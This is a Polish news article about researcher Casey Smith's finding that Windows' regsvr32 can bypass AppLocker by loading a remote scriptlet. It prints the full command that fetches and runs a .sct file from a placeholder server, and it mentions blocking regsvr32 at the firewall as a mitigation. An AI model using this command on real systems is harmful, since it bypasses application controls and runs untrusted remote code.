Regsvr32 może służyć do obejścia applockera w Windows 10

Wideo: Configuring AppLocker in Windows Server 2019 | Active Directory Group Policy 2024

Wideo: Configuring AppLocker in Windows Server 2019 | Active Directory Group Policy 2024
Anonim

Badacz z Kolorado, który nazywa się Casey Smith, odkrył, że Regsvr32 można wykorzystać do ominięcia AppLocker w systemie Windows 10, co jest dużym problemem dla użytkowników komputerów, zwłaszcza tych w środowisku biznesowym.

AppLocker został po raz pierwszy wprowadzony w Windows 7 i Windows Server 2008 R2. Został zaprojektowany, aby umożliwić administratorom określenie, która grupa lub użytkownicy mogą korzystać z niektórych lub wszystkich aplikacji w oparciu o unikalną tożsamość plików. Jeśli jesteś osobą, która ma tendencję do używania AppLocker, powinna być powszechnie znana, że ​​można go używać do tworzenia określonych reguł, aby umożliwić uruchamianie aplikacji lub zatrzymywanie ich na swoich śladach.

Dla tych, którzy mogą być nieświadomi, Regvr32 może służyć do rejestrowania i wyrejestrowywania bibliotek DLL. Nie jest to narzędzie uruchamiane jednym kliknięciem, ponieważ jest narzędziem wiersza polecenia, więc tylko zaawansowani użytkownicy komputerów powinni starać się korzystać z tego, co ma do zaoferowania.

Rozumiemy, że zastosowanie tej techniki nie zmienia rejestru systemu komputerowego, co utrudnia administratorom sprawdzenie, czy dokonano jakichkolwiek zmian.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

„Niesamowite jest to, że regsvr32 jest już świadomy proxy, używa TLS, śledzi przekierowania itp.… I… Zgadłeś, podpisany, domyślny plik binarny MS. Wszystko, co musisz zrobić, to umieścić plik.sct w kontrolowanej lokalizacji ”- napisał Smith.

Powyższa technika nie wymaga uprawnień administracyjnych i nie zmienia rejestru. Ponadto skrypty można wywoływać zarówno przez HTTP, jak i HTTPS. W tej chwili Microsoft nie opublikował łatki dla tego małego problemu, więc jedyną opcją w tym momencie jest zablokowanie Regsvr32 za pośrednictwem Zapory systemu Windows.

Co ciekawe, gigant oprogramowania jeszcze nie zareagował na problem bezpieczeństwa związany z jego systemem operacyjnym. Teraz, gdy jest już dostępny, spodziewamy się usłyszeć coś od firmy wraz z rozmowami o przyszłej łatce.

Regsvr32 może służyć do obejścia applockera w Windows 10